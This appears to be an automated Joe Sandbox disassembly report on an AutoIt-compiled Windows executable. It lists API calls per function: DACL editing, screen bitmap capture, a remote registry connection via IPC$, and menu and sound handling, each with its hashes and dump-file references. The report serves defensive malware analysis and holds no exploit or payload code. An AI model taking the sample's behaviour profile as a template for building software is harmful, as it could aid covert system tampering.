                                                                                                                                                                                                                                                      • API String ID: 34673085-438819550
                                                                                                                                                                                                                                                      • Opcode ID: 70c32fd856cddc145ebf79c595d1f1f103f7160d826f22675f5fe81b22b21265
                                                                                                                                                                                                                                                      • Instruction ID: ba7a36e112cee236a9aad1186baf8eb53e071a7247e3bd2698b64ea8e96a2613
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70c32fd856cddc145ebf79c595d1f1f103f7160d826f22675f5fe81b22b21265
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2481A2729043459FCB24DF24C845AAEB3E8BBD8324F14482EF885D7251EBB4DDC5AB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F2EF3B
                                                                                                                                                                                                                                                      • GetFocus.USER32 ref: 00F2EF4B
                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00F2EF56
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F2F081
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32 ref: 00F2F0AC
                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00F2F0CC
                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00F2F0DF
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00F2F113
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00F2F15B
                                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F2F193
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F2F1C8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 1296962147-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: a51389ec4d054c96d2044bf79e283fae223c33545e0a7eb9058e0071582fc8b2
                                                                                                                                                                                                                                                      • Instruction ID: afdb17330ca874a1ecba60b8741fd01e6fbe65e595b54cab3a601f174abccb1f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a51389ec4d054c96d2044bf79e283fae223c33545e0a7eb9058e0071582fc8b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B819D71619325AFD710CF14E984A6BBBF8FB88324F14053EF99897291D730D815EB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EFABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EFABD7
                                                                                                                                                                                                                                                        • Part of subcall function 00EFABBB: GetLastError.KERNEL32(?,00EFA69F,?,?,?), ref: 00EFABE1
                                                                                                                                                                                                                                                        • Part of subcall function 00EFABBB: GetProcessHeap.KERNEL32(00000008,?,?,00EFA69F,?,?,?), ref: 00EFABF0
                                                                                                                                                                                                                                                        • Part of subcall function 00EFABBB: HeapAlloc.KERNEL32(00000000,?,00EFA69F,?,?,?), ref: 00EFABF7
                                                                                                                                                                                                                                                        • Part of subcall function 00EFABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EFAC0E
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAC56: GetProcessHeap.KERNEL32(00000008,00EFA6B5,00000000,00000000,?,00EFA6B5,?), ref: 00EFAC62
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAC56: HeapAlloc.KERNEL32(00000000,?,00EFA6B5,?), ref: 00EFAC69
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EFA6B5,?), ref: 00EFAC7A
                                                                                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EFA8CB
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EFA8E0
                                                                                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EFA8FF
                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00EFA910
                                                                                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00EFA94D
                                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EFA969
                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00EFA986
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EFA995
                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00EFA99C
                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EFA9BD
                                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00EFA9C4
                                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EFA9F5
                                                                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EFAA1B
                                                                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EFAA2F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3996160137-0
                                                                                                                                                                                                                                                      • Opcode ID: 92db0be22d45ba7e3c860fa471fedde5ddd4811ec3448da4cc757dce3ef61994
                                                                                                                                                                                                                                                      • Instruction ID: a157441dc4fda04ee4e7d90fafe7a1a9fea2f522eae0532a0f162bc93958dcb6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92db0be22d45ba7e3c860fa471fedde5ddd4811ec3448da4cc757dce3ef61994
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8514CB5A0020DABDF11DF94DC44AFEBBB9FF05304F089129E915AB290D7319A05DB61
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00F19E36
                                                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F19E42
                                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00F19E4E
                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00F19E5B
                                                                                                                                                                                                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F19EAF
                                                                                                                                                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00F19EEB
                                                                                                                                                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F19F0F
                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000006,?), ref: 00F19F17
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00F19F20
                                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000006), ref: 00F19F27
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00F19F32
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                      • Opcode ID: 619035b662b7bea90f298a1634fdefb40292c2113a36c73651b8dcaadea212bf
                                                                                                                                                                                                                                                      • Instruction ID: e5ace5c34c68a5b6271911deb46ba77808990b44ffbc7c45f2cb9f4ffd9ec42b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 619035b662b7bea90f298a1634fdefb40292c2113a36c73651b8dcaadea212bf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18516A76904309EFDB15CFA8CC84EAEBBB9EF49710F14841DF95AA7210C771A841DBA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LoadString__swprintf_wprintf
                                                                                                                                                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                                      • API String ID: 2889450990-2391861430
                                                                                                                                                                                                                                                      • Opcode ID: 5f38315fd6759794a5451113f6d6f7c4cf0e94ad51904d998758b9b611ac7417
                                                                                                                                                                                                                                                      • Instruction ID: 1fe2a0d5021f25f5cb45f33428c06bd884e98f272b4e75d64f23874a9d23c4d9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f38315fd6759794a5451113f6d6f7c4cf0e94ad51904d998758b9b611ac7417
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38516572901509BACB15EBE0CE46FEEB7B8AF15300F10416AF505721A2EB316F56FB61
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LoadString__swprintf_wprintf
                                                                                                                                                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                                      • API String ID: 2889450990-3420473620
                                                                                                                                                                                                                                                      • Opcode ID: dc59dc6323d736196de4cabed764a563f1325de805bb1490e87a2561dc52c216
                                                                                                                                                                                                                                                      • Instruction ID: 2d10723fa1739dbae718d4487d1df8e1d0cdbb7037dfd61ca6f1c2d33a2a8fb7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc59dc6323d736196de4cabed764a563f1325de805bb1490e87a2561dc52c216
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD518572900609BADB15EBE0CE46FEEB7B8AF04300F104159F50972192DB756F9AFB61
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F055D7
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00F05664
                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00F81708), ref: 00F056ED
                                                                                                                                                                                                                                                      • DeleteMenu.USER32(00F81708,00000005,00000000,000000F5,?,?), ref: 00F0577D
                                                                                                                                                                                                                                                      • DeleteMenu.USER32(00F81708,00000004,00000000), ref: 00F05785
                                                                                                                                                                                                                                                      • DeleteMenu.USER32(00F81708,00000006,00000000), ref: 00F0578D
                                                                                                                                                                                                                                                      • DeleteMenu.USER32(00F81708,00000003,00000000), ref: 00F05795
                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00F81708), ref: 00F0579D
                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(00F81708,00000004,00000000,00000030), ref: 00F057D3
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00F057DD
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00F057E6
                                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(00F81708,00000000,?,00000000,00000000,00000000), ref: 00F057F9
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F05805
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3993528054-0
                                                                                                                                                                                                                                                      • Opcode ID: d9e589f26c45b5b70f52e6b468e341724aa724d5c81bab38e44716b32baa3846
                                                                                                                                                                                                                                                      • Instruction ID: 30d0a7a345e7e785ce6b739d8d967f15395a5e6a42fd9c435f3b93fecd663213
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9e589f26c45b5b70f52e6b468e341724aa724d5c81bab38e44716b32baa3846
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09710471A41609BEEB209F54CC49FABBF69FF00B64F244205FA156A1D1CBB26850FF54
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EFA1DC
                                                                                                                                                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00EFA211
                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00EFA22D
                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00EFA249
                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00EFA273
                                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00EFA29B
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EFA2A6
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EFA2AB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                                                                                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                      • API String ID: 1687751970-22481851
                                                                                                                                                                                                                                                      • Opcode ID: 3a8b2570597a3961ac4b979160a51bb48a93a71f3f783a124448caf06ea1d656
                                                                                                                                                                                                                                                      • Instruction ID: a7220abca0496fd7b44eff8ca0a1b9d84bb60216e2dd7732f1ff30bea474ae45
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a8b2570597a3961ac4b979160a51bb48a93a71f3f783a124448caf06ea1d656
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA410776C1022DAADB11EFA4DC85EEEB7B8FF14300F04506AE905B7160EA359E06DB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F22BB5,?,?), ref: 00F23C1D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                      • API String ID: 3964851224-909552448
                                                                                                                                                                                                                                                      • Opcode ID: fc0de512e5a0db1d6693a8e60676303c42a15a2e450dba6701175bb70fc2f5a2
                                                                                                                                                                                                                                                      • Instruction ID: 23971ea93b38ffc1e5ca003a4834bd0829480c79d901ab08524624465a0aa0f0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc0de512e5a0db1d6693a8e60676303c42a15a2e450dba6701175bb70fc2f5a2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F41737051029E8BDF00EF10E941AEB73A5FF52310F54581AEC552B392EB74AE0BEB11
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F336F4,00000010,?,Bad directive syntax error,00F5DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F025D6
                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00F336F4,00000010), ref: 00F025DD
                                                                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 00F02610
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F02632
                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F026A1
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                      • API String ID: 1080873982-4153970271
                                                                                                                                                                                                                                                      • Opcode ID: 3afbe5f4dbb4f4c555e349b482fc1a5dd0337498e2b7705ce9e008e062809daf
                                                                                                                                                                                                                                                      • Instruction ID: 9bdee3fe475b9a1ef18a6b88a6f25c8824316d3a75a05c2f2ae93a661dc42b39
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3afbe5f4dbb4f4c555e349b482fc1a5dd0337498e2b7705ce9e008e062809daf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B21533280021DBFCF11AB90CC4AFEE7B79BF19304F04445AF509761A2DA72A655EB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F07B42
                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F07B58
                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F07B69
                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F07B7B
                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F07B8C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
